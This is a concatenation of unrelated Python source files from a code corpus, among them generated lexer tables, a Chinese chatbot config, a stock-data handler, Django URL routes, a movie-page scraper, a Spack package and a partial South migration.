1, 1] _sedlex_rnd_199 = [_sedlex_rnd_197, _sedlex_rnd_198] _sedlex_DT_table_24 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_196 = [_sedlex_rnd_194, _sedlex_rnd_195] _sedlex_rnd_193 = [_sedlex_rnd_191, _sedlex_rnd_192] _sedlex_DT_table_23 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_190 = [_sedlex_rnd_188, _sedlex_rnd_189] _sedlex_DT_table_22 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_187 = [_sedlex_rnd_184, _sedlex_rnd_185, _sedlex_rnd_186] _sedlex_rnd_183 = [_sedlex_rnd_182] _sedlex_DT_table_21 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_181 = [_sedlex_rnd_179, _sedlex_rnd_180] _sedlex_rnd_178 = [_sedlex_rnd_177] _sedlex_DT_table_20 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_176 = [_sedlex_rnd_174, _sedlex_rnd_175] _sedlex_DT_table_19 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_173 = [_sedlex_rnd_171, _sedlex_rnd_172] _sedlex_DT_table_18 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_170 = [_sedlex_rnd_168, _sedlex_rnd_169] _sedlex_DT_table_17 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_167 = [_sedlex_rnd_165, _sedlex_rnd_166] _sedlex_rnd_164 = [_sedlex_rnd_163] _sedlex_DT_table_16 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_162 = [_sedlex_rnd_160, _sedlex_rnd_161] _sedlex_DT_table_15 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_159 = [_sedlex_rnd_157, _sedlex_rnd_158] _sedlex_rnd_156 = [_sedlex_rnd_154, _sedlex_rnd_155] _sedlex_rnd_153 = [_sedlex_rnd_151, _sedlex_rnd_152] _sedlex_rnd_150 = [_sedlex_rnd_148, _sedlex_rnd_149] _sedlex_rnd_147 = [_sedlex_rnd_145, _sedlex_rnd_146] _sedlex_rnd_144 = [_sedlex_rnd_142, _sedlex_rnd_143] _sedlex_rnd_141 = [_sedlex_rnd_139, _sedlex_rnd_140] _sedlex_rnd_138 = [_sedlex_rnd_136, _sedlex_rnd_137] _sedlex_rnd_135 = [_sedlex_rnd_133, _sedlex_rnd_134] _sedlex_rnd_132 = [_sedlex_rnd_130, _sedlex_rnd_131] _sedlex_DT_table_14 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3] _sedlex_rnd_129 = [_sedlex_rnd_126, _sedlex_rnd_127, _sedlex_rnd_128] _sedlex_DT_table_13 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2] _sedlex_rnd_125 = [_sedlex_rnd_123, _sedlex_rnd_124] _sedlex_DT_table_12 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2] _sedlex_rnd_122 = [_sedlex_rnd_120, _sedlex_rnd_121] _sedlex_DT_table_11 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3] _sedlex_rnd_119 = [_sedlex_rnd_116, _sedlex_rnd_117, _sedlex_rnd_118] _sedlex_DT_table_10 = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2] _sedlex_rnd_115 = [_sedlex_rnd_113, _sedlex_rnd_114] _sedlex_rnd_112 = [_sedlex_rnd_111] _sedlex_DT_table_9 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_110 = [_sedlex_rnd_109] _sedlex_rnd_108 = [_sedlex_rnd_106, _sedlex_rnd_107] _sedlex_rnd_105 = [_sedlex_rnd_104] _sedlex_DT_table_8 = [1, 2] _sedlex_rnd_103 = [_sedlex_rnd_101, _sedlex_rnd_102] _sedlex_rnd_100 = [_sedlex_rnd_99] _sedlex_rnd_98 = [_sedlex_rnd_95, _sedlex_rnd_96, _sedlex_rnd_97] _sedlex_rnd_94 = [_sedlex_rnd_93] _sedlex_DT_table_7 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_92 = [_sedlex_rnd_91] _sedlex_DT_table_6 = [1, 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3] _sedlex_rnd_90 = [_sedlex_rnd_87, _sedlex_rnd_88, _sedlex_rnd_89] _sedlex_rnd_86 = [_sedlex_rnd_85] _sedlex_rnd_84 = [_sedlex_rnd_83] _sedlex_DT_table_5 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2] _sedlex_rnd_82 = [_sedlex_rnd_80, _sedlex_rnd_81] _sedlex_rnd_79 = [_sedlex_rnd_78] _sedlex_DT_table_4 = [1, 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4] _sedlex_rnd_77 = [_sedlex_rnd_73, _sedlex_rnd_74, _sedlex_rnd_75, _sedlex_rnd_76] _sedlex_rnd_72 = [_sedlex_rnd_71] _sedlex_rnd_70 = [_sedlex_rnd_69] _sedlex_rnd_68 = [_sedlex_rnd_67] _sedlex_DT_table_3 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2] _sedlex_rnd_66 = [_sedlex_rnd_64, _sedlex_rnd_65] _sedlex_rnd_63 = [_sedlex_rnd_62] _sedlex_rnd_61 = [_sedlex_rnd_58, _sedlex_rnd_59, _sedlex_rnd_60] _sedlex_rnd_57 = [_sedlex_rnd_54, _sedlex_rnd_55, _sedlex_rnd_56] _sedlex_rnd_53 = [_sedlex_rnd_50, _sedlex_rnd_51, _sedlex_rnd_52] _sedlex_DT_table_2 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3] _sedlex_rnd_49 = [_sedlex_rnd_46, _sedlex_rnd_47, _sedlex_rnd_48] _sedlex_DT_table_1 = [1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 2, 2, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 2, 4, 5, 2, 6, 7, 2, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18, 19, 20, 21, 22, 2, 2, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 2, 25, 26, 23, 2, 27, 28, 23, 29, 30, 31, 32, 23, 33, 23, 23, 34, 23, 35, 36, 23, 23, 37, 23, 38, 39, 23, 40, 23, 23, 23, 41, 42, 43, 44] _sedlex_rnd_45 = [_sedlex_rnd_1, _sedlex_rnd_2, _sedlex_rnd_3, _sedlex_rnd_4, _sedlex_rnd_5, _sedlex_rnd_6, _sedlex_rnd_7, _sedlex_rnd_8, _sedlex_rnd_9, _sedlex_rnd_10, _sedlex_rnd_11, _sedlex_rnd_12, _sedlex_rnd_13, _sedlex_rnd_14, _sedlex_rnd_15, _sedlex_rnd_16, _sedlex_rnd_17, _sedlex_rnd_18, _sedlex_rnd_19, _sedlex_rnd_20, _sedlex_rnd_21, _sedlex_rnd_22, _sedlex_rnd_23, _sedlex_rnd_24, _sedlex_rnd_25, _sedlex_rnd_26, _sedlex_rnd_27, _sedlex_rnd_28, _sedlex_rnd_29, _sedlex_rnd_30, _sedlex_rnd_31, _sedlex_rnd_32, _sedlex_rnd_33, _sedlex_rnd_34, _sedlex_rnd_35, _sedlex_rnd_36, _sedlex_rnd_37, _sedlex_rnd_38, _sedlex_rnd_39, _sedlex_rnd_40, _sedlex_rnd_41, _sedlex_rnd_42, _sedlex_rnd_43, _sedlex_rnd_44]
StarcoderdataPython
90684
<gh_stars>0 # coding=utf-8 import unicodedata class Config(object): # 定义构造方法 def __init__(self): #__init__() 是类的初始化方法;它在类的实例化操作后 会自动调用,不需要手动调用; # 设置属性 self.stopwords = [" ", " ", " ", ",", ",", ".", "。", "、", "!", "!", "?", "?", ";", ";", "~", "~", "·", "·", ".", "…", "-", "#_", "—", "+", "=", "'", "\"", "‘", "’", "“", "”", "*", "&", "^", "%", "$", "/", "\\", "@"] self.stopwords,self.map_e2z = self.addStopwords() self.blackwords = ['自杀','死','火葬','我是你爸爸','我是你妈妈'] self.specialwords_pre = ['祝福', '祝愿', '预祝'] self.specialwords_gen = ['生日','新年','新春','春节','节日','元旦'] self.singlewords = ['哈','啊','哦','哦','呵','嘿','哎','哼'] self.removed_words = ['⊙'] self.punc_end = '.?!。?!》>' self.path_HighFreqWords = '../bin/data/words_highFreq.txt' self.HighFreqWords = self.getHFW() self.min_contenlen = 8 self.rate_gen2inp = 1.4 self.batchGenerating = True self.max_nb_sents=4 self.prefixTrim = True self.useThread = False self.fast_pattern = True def addStopwords(self): punc_zh = "!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟‧﹏.…" punc_en = unicodedata.normalize('NFKC', punc_zh[:-1]) + unicodedata.normalize('NFKC', punc_zh[-1])[-1] punc_zh = punc_zh + '。' punc_en = punc_en + '。' map_e2z = {punc_en[i]: punc_zh[i] for i in range(len(punc_en))} stopwords = self.stopwords + list(punc_zh) + list(punc_en) stopwords = list(set(stopwords)) return stopwords,map_e2z def getHFW(self): with open(self.path_HighFreqWords,'r') as f: s = f.read().strip().split('\n') return s
StarcoderdataPython
3211415
<filename>Handler/data_handler.py import yaml import types import pandas as pd from Handler.mongo_handler import MongoHandler from Utils.utils import Log yaml.warnings({'YAMLLoadWarning': False}) with open("config.yaml", "rt", encoding="utf-8") as stream: CONFIG = yaml.load(stream)['StockCrawler'] class DataHandler: def __init__(self): self.log = Log(DataHandler) self.mongo = MongoHandler() self.company_info = None self.company_list = None check_target_location = CONFIG['company_name_location'] if check_target_location == 'DB': self.get_target_company = types.MethodType(self._get_company_by_mongo, self) elif check_target_location == 'File': self.get_target_company = types.MethodType(self._get_company_by_file, self) def get_target_company(self): pass def save_stock_data(self, stock_df): self.mongo.update_stock_data(stock_df) def _get_company_by_mongo(self, obj): self.log.debug("Get company information by database(MongoDB)") self.company_info = pd.DataFrame(self.mongo.get_company()) self.company_list = self.company_info[['company', 'code']] def _get_company_by_file(self, obj): pass
StarcoderdataPython
1622341
<filename>src/tandlr/urls.py # -*- coding: utf-8 -*- from django.conf import settings from django.conf.urls import include, patterns, url from django.conf.urls.static import static from django.contrib import admin from django.views.generic import TemplateView from tandlr.registration.views import confirm admin.autodiscover() """ API REST VERSION v1 """ urlpatterns = [ url( r'^api/', include( 'tandlr.api.urls', namespace='api' ) ), url(r'^confirm/(?P<activation_key>\w+)/$', confirm, name='registration_confirm'), url(r'^admin/', include(admin.site.urls)), url(r'^admin_tools/', include('admin_tools.urls')), ] + static( settings.MEDIA_URL, document_root=settings.MEDIA_ROOT ) if 'tandlr.emails' in settings.INSTALLED_APPS and settings.TEMPLATE_DEBUG: urlpatterns = urlpatterns + patterns( '', url(r'^email-preview/', include('tandlr.emails.urls', namespace='emails')) ) if True: # This URL is only to test the sockets. Remove after that the sockets are # added in the frontend. urlpatterns += [ url( r'^notifications$', TemplateView.as_view( template_name="notifications/test_sockets.html" ), name='notifications_example' ), ]
StarcoderdataPython
1624103
import requests from bs4 import BeautifulSoup import csv file = open('movie.csv', mode='w', newline='') writer = csv.writer(file) writer.writerow(["title","img_src"]) MOVIE_URL = 'https://movie.naver.com/movie/running/current.nhn' movie_html = requests.get(MOVIE_URL) movie_soup = BeautifulSoup(movie_html.text,"html.parser") movie_list_box = movie_soup.find("ul", {"class" : "lst_detail_t1"}) movie_list = movie_list_box.find_all('li') final_result = [] for movie in movie_list: title = movie.find("dt", {"class" : "tit"}).find("a").text img_src = movie.find("div", {"class" : "thumb"}).find("img")['src'] movie_info = { 'title' : title, 'img_src' : img_src } final_result.append(movie_info) for result in final_result: row = [] row.append(result['title']) row.append(result['img_src']) writer.writerow(row) print(final_result)
StarcoderdataPython
1770489
class Solution: def isInterleave(self, s1: str, s2: str, s3: str) -> bool: len1 = len(s1) len2 = len(s2) len3 = len(s3) if len1 + len2 != len3: return False dp = [[False] * (len2 + 1) for i in range(len1 + 1)] dp[0][0] = True for i in range(1, len1 + 1): dp[i][0] = (dp[i - 1][0] and s1[i - 1] == s3[i - 1]) for i in range(1, len2 + 1): dp[0][i] = (dp[0][i - 1] and s2[i - 1] == s3[i - 1]) for i in range(1, len1 + 1): for j in range(1, len2 + 1): dp[i][j] = (dp[i][j - 1] and s2[j - 1] == s3[i + j - 1]) or ( dp[i - 1][j] and s1[i - 1] == s3[i + j - 1]) return dp[-1][-1] s1 = "aabcc" s2 = "dbbca" s3 = "aadbbcbcac" interleave = Solution().isInterleave(s1, s2, s3) print(interleave)
StarcoderdataPython
164967
<filename>release/scripts/presets/camera/GoPro_Hero3_Black.py import bpy bpy.context.camera.sensor_width = 6.16 bpy.context.camera.sensor_height = 4.62 bpy.context.camera.lens = 2.77 bpy.context.camera.sensor_fit = 'AUTO'
StarcoderdataPython
1676390
<reponame>slamavl/quantarhei<filename>quantarhei/wizard/benchmarks/bm_001.py # -*- coding: utf-8 -*- import quantarhei as qr def main(): with qr.energy_units("1/cm"): mol1 = qr.Molecule([0.0, 12000.0]) mol2 = qr.Molecule([0.0, 12100.0]) mol3 = qr.Molecule([0.0, 12100.0]) agg = qr.Aggregate([mol1, mol2, mol3]) m1 = qr.Mode(100) mol1.add_Mode(m1) m2 = qr.Mode(100) mol2.add_Mode(m2) m3 = qr.Mode(100) mol3.add_Mode(m3) agg.build(mult=1) print(agg.Ntot)
StarcoderdataPython
4808273
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class PickUpInfo(object): def __init__(self): self._pick_up_address = None self._pick_up_code = None self._pick_up_shop_name = None self._pick_up_type = None self._table_num = None @property def pick_up_address(self): return self._pick_up_address @pick_up_address.setter def pick_up_address(self, value): self._pick_up_address = value @property def pick_up_code(self): return self._pick_up_code @pick_up_code.setter def pick_up_code(self, value): self._pick_up_code = value @property def pick_up_shop_name(self): return self._pick_up_shop_name @pick_up_shop_name.setter def pick_up_shop_name(self, value): self._pick_up_shop_name = value @property def pick_up_type(self): return self._pick_up_type @pick_up_type.setter def pick_up_type(self, value): self._pick_up_type = value @property def table_num(self): return self._table_num @table_num.setter def table_num(self, value): self._table_num = value def to_alipay_dict(self): params = dict() if self.pick_up_address: if hasattr(self.pick_up_address, 'to_alipay_dict'): params['pick_up_address'] = self.pick_up_address.to_alipay_dict() else: params['pick_up_address'] = self.pick_up_address if self.pick_up_code: if hasattr(self.pick_up_code, 'to_alipay_dict'): params['pick_up_code'] = self.pick_up_code.to_alipay_dict() else: params['pick_up_code'] = self.pick_up_code if self.pick_up_shop_name: if hasattr(self.pick_up_shop_name, 'to_alipay_dict'): params['pick_up_shop_name'] = self.pick_up_shop_name.to_alipay_dict() else: params['pick_up_shop_name'] = self.pick_up_shop_name if self.pick_up_type: if hasattr(self.pick_up_type, 'to_alipay_dict'): params['pick_up_type'] = self.pick_up_type.to_alipay_dict() else: params['pick_up_type'] = self.pick_up_type if self.table_num: if hasattr(self.table_num, 'to_alipay_dict'): params['table_num'] = self.table_num.to_alipay_dict() else: params['table_num'] = self.table_num return params @staticmethod def from_alipay_dict(d): if not d: return None o = PickUpInfo() if 'pick_up_address' in d: o.pick_up_address = d['pick_up_address'] if 'pick_up_code' in d: o.pick_up_code = d['pick_up_code'] if 'pick_up_shop_name' in d: o.pick_up_shop_name = d['pick_up_shop_name'] if 'pick_up_type' in d: o.pick_up_type = d['pick_up_type'] if 'table_num' in d: o.table_num = d['table_num'] return o
StarcoderdataPython
1748950
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Tassel(Package): """TASSEL is a software package to evaluate traits associations, evolutionary patterns, and linkage disequilibrium.""" homepage = "http://www.maizegenetics.net/tassel" git = "https://bitbucket.org/tasseladmin/tassel-5-standalone.git" version('2017-07-22', commit='<PASSWORD>') depends_on('java', type=('build', 'run')) depends_on('perl', type=('build', 'run')) def install(self, spec, prefix): install_tree('.', prefix.bin) def setup_run_environment(self, env): env.prepend_path('CLASSPATH', self.prefix.bin.lib)
StarcoderdataPython
112221
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Praise' db.create_table('staff_directory_praise', ( ('id', self.gf( 'django.db.models.fields.AutoField')(primary_key=True)), ('recipient', self.gf('django.db.models.fields.related.ForeignKey') (to=orm['core.person'])), ('praise_nominator', self.gf( 'django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('cfpb_value', self.gf( 'django.db.models.fields.CharField')(max_length=100)), ('reason', self.gf('django.db.models.fields.TextField')()), ('date_added', self.gf('django.db.models.fields.DateTimeField') (auto_now=True, blank=True)), )) db.send_create_signal('staff_directory', ['Praise']) def backwards(self, orm): # Deleting model 'Praise' db.delete_table('staff_directory_praise') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('<PASSWORD>', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'core.office_location': { 'Meta': {'object_name': 'OfficeLocation'}, 'city': ('django.db.models.fields.CharField', [], {'max_length': '56'}), 'id': ('django.db.models.fields.CharField', [], {'max_length': '12', 'primary_key': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}), 'street': ('django.db.models.fields.CharField', [], {'max_length': '56'}), 'suite': ('django.db.models.fields.CharField', [], {'max_length': '56', 'null': 'True', 'blank': 'True'}), 'zip': ('django.db.models.fields.CharField', [], {'max_length': '10'}) }, 'core.orggroup': { 'Meta': {'object_name': 'OrgGroup'}, 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '128'}) }, 'core.person': { 'Meta': {'object_name': 'Person'}, 'allow_tagging': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'current_projects': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'desk_location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'email_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'home_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'mobile_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}), 'office_location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OfficeLocation']", 'null': 'True', 'blank': 'True'}), 'office_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}), 'org_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}), 'photo_file': ('core.thumbs.ImageWithThumbsField', [], {'default': "'avatars/default.jpg'", 'max_length': '100'}), 'schools_i_attended': ('django.db.models.fields.TextField', [], {'null': 'True', 